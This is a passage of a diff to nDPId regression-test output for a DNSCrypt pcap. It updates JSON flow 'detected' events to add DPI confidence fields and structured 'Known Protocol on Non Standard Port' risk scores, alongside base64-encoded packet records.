AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":433,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAABQwikAub0RJb4KAAABuf2aQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":433,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":946739348800,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":946739348800,"pkt":"ZmZmZmZmRERERERECABFAADTW7dAADkR0Ga5\/ZpCCgAAARD3svcAv+AkY0uBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPzOPvxAqRNc7Q72GZx6clSW\/rILjCJS5AVCUtIfh\/knKqjuiGnU\/ySlMpkdSKAUBEzuxnQcAR\/n3q9w6kY3ZQBbAAtR8Cvhyf4swkJ5CXEM5Flzvf2K4fhPC+UgsGecNlsAC1HwK+HJAAAAAV9TdNFfVMZR"}
@@ -896,26 +896,26 @@
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":2,"flow_last_seen":946739348805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":946739348805,"pkt":"ZmZmZmZmRERERERECABFAADTW7tAADkR0GK5\/ZpCCgAAARD3vB8Av9b\/Y0iBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPzOPvxAqRNc7Q72GZx6clSW\/rILjCJS5AVCUtIfh\/knKqjuiGnU\/ySlMpkdSKAUBEzuxnQcAR\/n3q9w6kY3ZQBbAAtR8Cvhyf4swkJ5CXEM5Flzvf2K4fhPC+UgsGecNlsAC1HwK+HJAAAAAV9TdNFfVMZR"}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAIclaRAAL0RCvwKAAABjgTMb8m\/AbsCCB1KEX8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAXclaUgAL0RJzsKAAABjgTMb+dYAbsGBJhPEXwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAIclaZAAL0RCvoKAAABjgTMb6OnAbsCCB1KEX0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":443,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAABQlaUAub0RTA4KAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":443,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAIcladAAL0RCvkKAAABjgTMb7UbAbsCCB1KEXsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAXclaggAL0RJzgKAAABjgTMb99cAbsGBKBJEX4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
